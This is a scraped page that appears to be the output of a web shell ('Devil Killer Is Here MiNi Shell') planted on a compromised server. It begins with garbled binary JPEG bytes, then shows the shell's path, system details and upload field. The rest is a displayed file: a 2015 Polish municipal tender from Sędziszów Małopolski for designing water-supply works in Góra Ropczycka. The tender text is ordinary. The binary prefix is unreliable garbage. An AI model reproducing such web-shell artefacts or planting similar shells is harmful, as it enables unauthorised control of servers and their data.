JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150611/85519-N-2015.html

<p class="kh_header"><b>Sędziszów Małopolski: Opracowanie projektu, przebudowy, rozbudowy i modernizacji wodociągu wraz                 z stacją uzdatniania wody i zasilaniem elektrycznym w Górze Ropczyckiej</b><br>
<b>Numer ogłoszenia: 85519 - 2015; data zamieszczenia: 11.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sędziszów Małopolski , ul. Rynek 1, 39-120 Sędziszów Małopolski, woj. podkarpackie, tel. 17 22 16 001, faks 17 22 16 313.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sedziszow-mlp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu, przebudowy, rozbudowy i modernizacji wodociągu wraz                 z stacją uzdatniania wody i zasilaniem elektrycznym w Górze Ropczyckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Opracowanie projektu, przebudowy, rozbudowy i modernizacji wodociągu wraz                 z stacją uzdatniania wody i zasilaniem elektrycznym w Górze Ropczyckiej. 

Stan istniejący:
Istniejący w Górze Ropczyckiej wodociąg wiejski obejmuje sieć wodociągową, Stację Uzdatniania Wody (SUW) i dwa zbiorniki wyrównawcze. Wodociąg zasilają 2 studnie głębinowe czynne S- 3 i S- 4 zaznaczone na załączniku graficznym Nr 8.
Budynek SUW jest ocieplony, wyposażony w 2 pompy S - 82 oraz 2 hydrofory 
z wyłącznikiem ciśnieniowym i 2 odżelaziacze (filtry).
Wodociąg zbudowany z rur azbestowych,  stalowych oraz PCV doprowadza wodę do około 270 gospodarstw domowych. Zły stan techniczny wodociągu, wysoka awaryjność, problemy z dostawą wody o odpowiednim ciśnieniu doo części gospodarstw oraz zły stan zasilania elektrycznego (długość około 1 km) i brak kabla sterowniczego wymuszają konieczność podjęcia prac projektowych.

2.	W ramach zadania należy zaprojektować:

1.	nową sieć wodociągową z przyłączami do wszystkich budynków istniejących 
i będących w trakcie budowy oraz do ewentualnych działek niezabudowanych, które mogą być zainwestowane w najbliższym okresie (szacunkowa ilość około 25 przyłączy),
2.	sieć wodociągową na działki w rejon otworu studziennego R - 1 z wodą uzdatnioną (przy granicy z gminą Ropczyce) i połączyć w rejonie wymienionego otworu studziennego z siecią znajdującą się na terenie Gminy Ropczyce,
3.	połączenie wodociągu w Sędziszowie Małopolskim z wodociągiem w Górze Ropczyckiej na działkach objętych planem zagospodarowania przestrzennego,
4.	kabel sterowniczy studni  S - 3, S - 4 i zasilanie elektryczne,
5.	kabel sterowniczy do  istniejącego otworu studziennego R - 1,
6.	zestaw hydroforowo - pompowy z falownikiem i monitoringiem,
7.	remont pomieszczeń SUW: wydzielenie pomieszczenia pod chlorownię, wymianę stolarki okiennej i drzwiowej, niwelację posadzki, malowanie, płytki, itp. oraz inne roboty konieczne do prawidłowego funkcjonowania SUW.

Projekt winien również zawierać: 

a)	część opisującą  wydajność SUW,  zestawienia zawierające przekroje rurociągów, długość w/g średnic,  
b)	projekt organizacji ruchu w przypadku prac na  drogach,
c)	oświadczenia osób nie zainteresowanych przyłączeniem do wodociągu.
3.	 Szczegółowy zakres opracowania obejmuje:

1)	Wyrysy i wypisy z rejestru ewidencji gruntów wraz z zawartymi umowami cywilno- prawnymi w celu uzyskania decyzji lokalizacyjnej i pozwolenia na budowę,
2)	uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego 
w miejscowości  Góra Ropczycka -  około 1 200  mieszkańców,
3)	Uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia (Wykonawca wystąpi z wnioskiem o decyzję do Urzędu Miejskiego w Sędziszowie Małopolskim),
4)	projekt budowlany wraz z wnioskiem i wykazem działek o posiadanym prawie do dysponowania na cele budowlane w/g wymogów Starostwa Powiatowego w Ropczycach,
5)	wykaz przyłączy z numerami działek i adresami,
6)	podkłady geodezyjne sytuacyjno wysokościowe do celów projektowych  (aktualne)   niezbędne do wykonania projektu wraz z wektoryzacją map, aktualizacją, rzeźbą terenu i opłatami w Ośrodku Geodezyjnym 
w Ropczycach,
7)	dokumentację towarzyszącą  (operat wodno-prawny ) na przejście pod potokami, rowami, inne płatne uzgodnienia, decyzje w tym: uzyskanie warunków technicznych zasilania w energię elektryczną SUW oraz warunków włączenia do istniejącej sieci wodociągowej w Sędziszowie Młp i gminie Ropczyce, 
8)	monitoring  umożliwiający przesyłanie informacji o stanie pracy pomp w trybie ON-LINE   SUW z wykorzystaniem technologii GPRS współpracujący 
z istniejącym monitoringiem na Stacji Uzdatniania Wody w Sędziszowie Młp. przy ul. Głowackiego. Monitoringiem winien być również objęty poziom wody w zbiornikach wyrównawczych, otwarcie włazów zabezpieczających, monitoring studni głębinowych,
9)	dokonanie płatnych uzgodnień m.in. na Naradzie Koordynacyjnej w Starostwie Ropczycko - Sędziszowskim, Karpackiej Spółce Gazowniczej,  Państwowym Inspektorem Sanitarnym,
10)	dokonanie uzgodnień branżowych przy skrzyżowaniach z gazem, kablami, ziemnymi i przejściami pod drogami,
11)	projekty budowlane opracowane zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane ( Dz. U. z 2013 r., poz. 1409 ze zm.) oraz Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r., poz.462 ze zm.), bądź innymi przepisami prawnymi obowiązującymi w trakcie opracowywania projektu,
12)	projekty wykonawcze, przedmiary robót i specyfikacje techniczne wykonania 
i odbioru robót budowlanych opracowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013, poz. 1129 ze zm.),

13)	kosztorysy inwestorskie uproszczone opracowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod 
i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2013 r., poz. 1129 ze zm.),
14)	informacje dotyczące bezpieczeństwa i ochrony zdrowia - na podstawie art. 20 ust.1 pkt. 1 b ustawy z dnia 2 lipca 1994r. Prawo budowlane i przepisu wykonawczego,
15)	kompletne materiały do decyzji lokalizacji inwestycji celu publicznego wraz  
z umowami cywilno- prawnymi wejścia w teren działek,
16)	wnioski do Starostwa Powiatowego w Ropczycach o wydanie decyzji ograniczającej sposobu korzystania z działek /w przypadku braku zgód na wejście w teren z realizacją inwestycji,
17)	wnioski (płatne ogłoszenia) do Starostwa Powiatowego o wydanie zezwolenia na zaprojektowanie  inwestycji  na działkach o nieuregulowanym stanie prawnym,
18)	Wykonawca winien uwzględnić w cenie ryczałtowej zaprojektowanie przyłączy do nowo powstających budynków, jak również wykonanie przyłączy do działek obecnie  niezabudowanych (ok. 25 działek), jeżeli właściciele zwrócą się o ich zaprojektowanie. 

4.	 Dokumentacja projektowa.

Dokumentację projektową  należy wykonać w ilościach:
a)	projekt budowlany - 4 egz. w formie papierowej oraz 2 egz. w formie elektronicznej,
b)	projekt wykonawczy z przekrojami i profilami - 2 egz. w formie papierowej oraz 2 egz. w formie elektronicznej,
c)	przedmiar robót - 2 egz. w formie papierowej i 2 egz. w formie elektronicznej,
d)	kosztorys inwestorski - 2 egz. w formie papierowej i 2 egz. w formie elektronicznej,
e)	specyfikację techniczną wykonania i odbioru robót - 2 egz. w formie papierowej oraz 1 egz. w formie elektronicznej,
f)	dokumentację geotechniczną - 2 egz. w formie papierowej oraz 1 egz. 
             w formie elektronicznej.
      g)   wykaz przyłączy dla budynków i działek z adresami i nr działek (nazwiska w   
            porządku alfabetycznym) - 1 egz.
Formę elektroniczną dokumentacji projektowej należy przekazać Zamawiającemu na nośnikach elektronicznych w formacie .pdf  oraz dodatkowo w wersji edytowalnej: 
- w formacie .ath przedmiar robót i kosztorys inwestorski,
- w formacie .dwg projekt budowlany i wykonawczy.

Dokumentacja projektowa nie może zawierać znaków towarowych, patentów lub pochodzenia zastosowanych materiałów i urządzeń.
5.	Warunki wykonania przedmiotu zamówienia:

1)	 Przebieg trasy wodociągu i miejsca podłączenia przyłączy winny być uzgodnione z każdym właścicielem nieruchomości w formie umowy cywilno-prawnej. Integralną częścią umowy musi być załącznik graficzny przedstawiający projektowany przebieg trasy wodociągu podpisany przez właściciela nieruchomości i projektanta.  
W przypadku umów cywilno-prawnych podpisanych przez pełnomocnika lub spadkobierców należy dołączyć stosowny dokument wskazujący prawo do dysponowania gruntami lub składania oświadczeń woli w imieniu właściciela.

2)	 Wykonawca zobowiązany jest do pełnienia nadzoru autorskiego. Nadzór autorski wynikający z poprawy i koniecznych uzupełnień będzie pełniony 
w ramach kosztów opracowania dokumentacji projektowej.

3)	Dokumentacja projektowa winna być zaopatrzona w wykaz opracowań oraz pisemne oświadczenie projektanta, że jest wykonana zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi oraz normami oraz że została wykonana w stanie kompletnym z punktu widzenia celu.

4)	Dokumentacja projektowa winna umożliwić prawidłową realizację zadania oraz musi posiadać wszelkie wymagane opinie i uzgodnienia do uzyskania pozwolenia na budowę. Przed złożeniem materiałów do decyzji lokalizacyjnej projektant zobowiązany jest zorganizować Radę Techniczną i przedstawić główne założenia projektu. Radę Techniczną  należy też zorganizować przed złożeniem dokumentacji do pozwolenia na budowę.

5)	Dokumentacja projektowa winna być uzgodniona z Przedsiębiorstwem Gospodarki Komunalnej i Mieszkaniowej Sp. z o. o. w Sędziszowie Małopolskim, Przedsiębiorstwem Usług Komunalnych w Ropczycach - zarządcami sieci oraz z Podkarpackim Zarządem Melioracji i Urządzeń Wodnych w Rzeszowie. Przekroczenia dróg  należy uzgodnić:
-	gminnych z Referatem Inwestycji, Drogownictwa i Planowania Przestrzennego Urzędu Miejskiego w Sędziszowie Małopolskim,
-	powiatowych z Wydziałem Dróg Powiatowych Starostwa Powiatowego w Ropczycach,
-	krajowej z Generalną Dyrekcja dróg Krajowych i Autostrad oddział                      w Rzeszowie.

6)	Wykonawca wystąpi w imieniu Zamawiającego, którym jest Gmina Sędziszów  Małopolski o pozwolenie na budowę. 

7)	Ewentualne wyłączenia podyktowane względami techniczno-ekonomicznymi, należy uzgodnić z Zamawiającym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-3, 71.31.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać doświadczenie w wykonaniu opracowań o charakterze                         i złożoności porównywalnej z zakresem niniejszego zamówienia tj. wykonać w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dokumentację projektową dotyczącą sieci wodociągowej wraz  z przyłączami lub sieci kanalizacji sanitarnej wraz                         z przyłączami o wartości minimum 100 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować na czas realizacji zamówienia odpowiednio wykwalifikowanym personelem bezpośrednio zatrudnionym do wykonania zamówienia, tj.:
1/   Projektant branży sanitarnej - musi posiadać uprawnienia budowlane do projektowania                           w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych                                  i kanalizacyjnych bez ograniczeń; 
2/ Projektant branży elektrycznej - musi posiadać uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń;
3/ Projektant branży budowlanej - musi posiadać uprawnienia budowlane do projektowania w specjalności w specjalności konstrukcyjno - budowlanej bez ograniczeń.

Posiadane przez w/w osoby  uprawnienia w wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SIWZ powinny być zgodne z ustawą z dnia 7 lipca 1994r, Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) oraz aktami wykonawczymi do ustawy Prawo budowlane.
Osoba, która posiada uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo
budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego
odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych
w budownictwie i zachowała uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie
wykazuje te dokumenty jako obowiązujące.
Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza,
odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego
oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo
Budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) oraz ustawy o zasadach uznawania
kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r.,
Nr 63, poz. 394) a także w sytuacji określonej w art. 20 a ustawy z dnia z dnia 15 grudnia 2000 r. 
o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. 2001, 
nr 5 poz. 42 ze zm.).
Wskazane w  niniejszym punkcie osoby powinny biegle posługiwać się językiem polskim. 
W przypadku, gdy wskazane osoby nie wykazują się biegłą znajomością języka polskiego Wykonawca jest zobowiązany zapewnić co najmniej jednego tłumacza na okres realizacji umowy w celu realizacji potrzeb wynikających z wykonywanego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż posiada środki finansowe lub posiada zdolność kredytową w wysokości co najmniej 60 000,00 zł (słownie: sześćdziesiąt  tysięcy złotych, 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (Pełnomocnictwo  w formie oryginału albo kopii potwierdzonej za zgodność przez notariusza /odpis/);
2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu                                 o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia Umowy                        w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopie, poświadczoną za zgodność  z oryginałem przez Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Okres gwarancji - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony dopuszczają możliwość zmiany postanowień Umowy w następującym zakresie: 
a)	Terminu wykonania Umowy - w sytuacji, gdy nastąpi opóźnienie w terminie jej wykonania z przyczyn niezależnych od Wykonawcy,  a w szczególności:
-	opóźnienia w wydaniu decyzji lub opinii przez organy lub podmioty właściwe do ich wydania, w przypadku gdy Wykonawca dochował wszelkiej staranności                      w przygotowaniu wniosku o wydanie takiej decyzji i opinii,
-	konieczności uzyskania dodatkowych uzgodnień i opinii od organów lub podmiotów,
-	wykonania uzupełniających analiz, opracowań,
-	konieczności wykonania dodatkowych prac związanych z np. przekopami próbnymi, odkryciem istniejących obiektów,
-	konieczności uzyskania dodatkowych uzgodnień terenowo - prawnych.
b)	Przedmiotu Umowy - w sytuacji, gdy 
-	zmiana zakresu Przedmiotu Umowy stała się konieczna ze względu na interes Zamawiającego, w szczególności z uwagi na zmianę zakresu dokumentacji projektowej pierwotnie przeznaczonego do wykonania w ramach Przedmiotu Umowy dotyczącego sieci np. długości sieci wodociągowej, ilości przyłączy lub innych obiektów,
c)	wysokości wynagrodzenia Wykonawcy z tytułu realizacji Umowy - w sytuacji, gdy konieczność wprowadzenia tych zmian powodowana jest:
-	zmianą zakresu Przedmiotu Umowy lub zmianą terminu wykonania umowy wynikającą z konieczności uzyskania dodatkowych uzgodnień, opinii, analiz, opracowań  niezbędnych do opracowania dokumentacji, dodatkowych prac związanych z np. przekopami próbnymi, odkryciem istniejących obiektów                           i uzyskaniem uzgodnień terenowo - prawnych,
-	zmianą w obowiązujących przepisach prawnych,
-	zmianą Przedmiotu Umowy z powodów, o których mowa w ust.1b) i a).
d)	Przedmiotu Umowy, Wynagrodzenia i terminu wykonania Umowy lub poszczególnych jej etapów - w sytuacji, gdy zmiany te będą spowodowane następstwem działań organów administracji i innych podmiotów, z którymi będą wymagane uzgodnienia,
-	w sytuacji trudności z pozyskaniem gruntów dla lokalizacji inwestycji, czego następstwem może być zmiana lokalizacji projektowanej infrastruktury,
-	konieczności zmiany trasy projektowanej infrastruktury z powodu braku możliwości lokalizacji sieci zgodnie z warunkami z powodów braku zgód właściciela terenu lub wysokich roszczeń odszkodowawczych.
